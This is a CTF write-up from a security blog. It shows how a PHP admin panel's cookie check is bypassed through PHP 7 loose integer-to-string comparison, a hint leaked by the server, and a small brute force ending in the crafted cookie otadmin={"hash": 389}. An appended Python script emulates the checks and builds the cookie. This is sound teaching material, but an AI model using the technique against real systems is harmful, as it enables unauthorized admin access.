Mars's 5εcur1ty Notebook

An irregularly updated technical blog centred on information security: CTFs, vulnerability verification, analysis of bug bounty reports, and more.

Teaser CONFidence CTF writeup


https://gameserver.zajebistyc.tf/admin/


Clicking the backup file gives us the PHP source of the admin panel.

[screenshot: PHP source of the backup file]

We considered several ways to bypass the checks.
What we can see from the source is that the panel reads a cookie named otadmin.

To bypass the first "if", which checks the raw cookie against a regex, and the second one, which rejects a json_decode result of NULL, we simply send a cookie like this: otadmin={"hash": 123}
The cookie must match this regex: {"hash": [0-9A-Z\"]+}

If we instead send something like otadmin={'hash': '123'} or {'hash': 123}, the call

json_decode($_COOKIE['otadmin'], true)

returns NULL, because single quotes are not valid JSON, and we cannot get past the second "if".

The third "if" compares the hash from the cookie with the MD5 of the configured password. We bypass it by brute force, but before that we can get a hint from the server, which it prints whenever the comparison fails.

I CAN EVEN GIVE YOU A HINT XD 0006464640640064000646464640006400640640646400

We focus on this line:

echo(ord(MD5($cfg_pass)[$i]) & 0xC0);

ANDing a character with 0xC0 gives 0 when it is a digit 0-9 (0x30-0x39) and 64 when it is a letter a-z (0x61-0x7A; uppercase A-Z gives 64 as well).
So the hint tells us, for each of the 32 hex characters of the MD5, whether it is a digit or a letter: the first three are digits and the fourth is a letter. Because the hash in our cookie is an integer and PHP 7 compares an integer with a string loosely (==/!=) by converting the string using only its leading numeric prefix (PHP 8 changed this), the integer formed by those three leading digits compares equal to the whole MD5 string. That leaves at most 1000 candidates, 0 to 999, to try.

I used Burp Suite to send the requests. We get the flag when the cookie is:

otadmin={"hash": 389}

Note that the value must be an unquoted integer: {"hash": "389"} also passes the regex, but PHP only compares two strings numerically when both are fully numeric, so a quoted string never matches the MD5.

Congratulations! p4{wtf_php_comparisons_how_do_they_work}
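As an added example that is not part of the original writeup, the following Python script reproduces the reasoning above offline: it emulates the regex and json_decode checks, decodes the hint into a digit/letter mask, emulates PHP 7's loose int-vs-string comparison (the behaviour the flag name refers to, removed in PHP 8), and enumerates the candidate integers the way the Burp run did. The value SAMPLE_MD5 is constructed to fit the hint's pattern because the real hash was never shown, and the function names are my own.

```python
# Added example, not code from the original writeup: reproduces the three checks
# offline, decodes the hint, and emulates the PHP 7 loose comparison that makes
# an integer "hash" compare equal to the MD5 hex string.
import json
import re
from typing import Optional

# Cookie format quoted in the writeup (checks 1 and 2).
COOKIE_RE = re.compile(r'^{"hash": [0-9A-Z\"]+}$')
# Hint printed by the server, copied from the writeup.
HINT = "0006464640640064000646464640006400640640646400"
# Constructed stand-in for the real MD5 (never shown in the writeup): it follows
# HINT's digit/letter pattern and deliberately has an 'e' in position 4.
SAMPLE_MD5 = "389eab1f02c745deab601f29c8d3ea45"
# PHP 7 "leading numeric" prefix: sign, digits, optional fraction and exponent.
LEADING_NUM = re.compile(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")
# Fully numeric string (no trailing garbage), the rule for string-vs-string.
FULL_NUM = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def cookie_accepted(cookie: str) -> Optional[dict]:
    """Checks 1 and 2: regex on the raw cookie, then json_decode. Returns the
    decoded object, or None where PHP would reject the cookie (json_decode
    gives NULL for single-quoted JSON, just as json.loads raises)."""
    if not COOKIE_RE.match(cookie):
        return None
    try:
        data = json.loads(cookie)
    except json.JSONDecodeError:
        return None
    return data if isinstance(data, dict) else None


def decode_hint(hint: str) -> str:
    """Split the run of 0/64 values into a mask: D for a digit, L for a letter.
    ord(c) & 0xC0 is 0 for '0'..'9' (0x30-0x39) and 64 for both 'a'..'z'
    (0x61-0x7A) and 'A'..'Z' (0x41-0x5A), so the MD5's case does not matter."""
    mask, i = [], 0
    while i < len(hint):
        if hint.startswith("64", i):
            mask.append("L")
            i += 2
        elif hint[i] == "0":
            mask.append("D")
            i += 1
        else:
            raise ValueError(f"unexpected value in hint at offset {i}")
    return "".join(mask)


def leading_digit_count(mask: str) -> int:
    """Hex digits before the first letter; only these survive PHP's conversion."""
    return len(mask) - len(mask.lstrip("D"))


def php7_loose_eq_int_str(n: int, s: str) -> bool:
    """Emulate PHP 7 `$int == $string` (close enough for hex strings): only the
    leading numeric prefix counts, 'e'/'E' starts an exponent only when digits
    follow it (so "389eab..." is 389), and a string with no numeric prefix is 0.
    PHP 8 changed this: a non-numeric string then never equals an int."""
    m = LEADING_NUM.match(s)
    return n == 0 if m is None else float(m.group(0)) == n


def php7_loose_eq_str_str(a: str, b: str) -> bool:
    """PHP `$string == $string`: numeric only when BOTH strings are fully numeric,
    which is why a quoted {"hash": "389"} passes the regex but not the compare."""
    if FULL_NUM.match(a) and FULL_NUM.match(b):
        return float(a) == float(b)
    return a == b


def build_cookie(hash_value: int) -> str:
    """Cookie passing checks 1 and 2 with an unquoted integer: otadmin={"hash": 389}."""
    body = json.dumps({"hash": hash_value})  # json.dumps emits the space after ':'
    assert cookie_accepted(body) == {"hash": hash_value}
    return "otadmin=" + body


def find_hash(md5_hex: str, hint: str = HINT) -> Optional[int]:
    """Offline version of the Burp brute force: the first of the 10**k candidates
    (k = leading digit count from the hint) that PHP 7 would accept as equal."""
    for v in range(10 ** leading_digit_count(decode_hint(hint))):
        if php7_loose_eq_int_str(v, md5_hex):
            return v
    return None


if __name__ == "__main__":
    mask = decode_hint(HINT)
    print(mask, "leading digits:", leading_digit_count(mask))
    print("cookie to send for SAMPLE_MD5:", build_cookie(find_hash(SAMPLE_MD5)))
```

Against the live challenge the same loop would send build_cookie(v) for each v and stop at the response containing the flag; the leading-zero case (an MD5 starting with "042") is covered because json.dumps emits 42, which is exactly the value PHP's conversion of "042..." yields.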

Copyright Mars 2019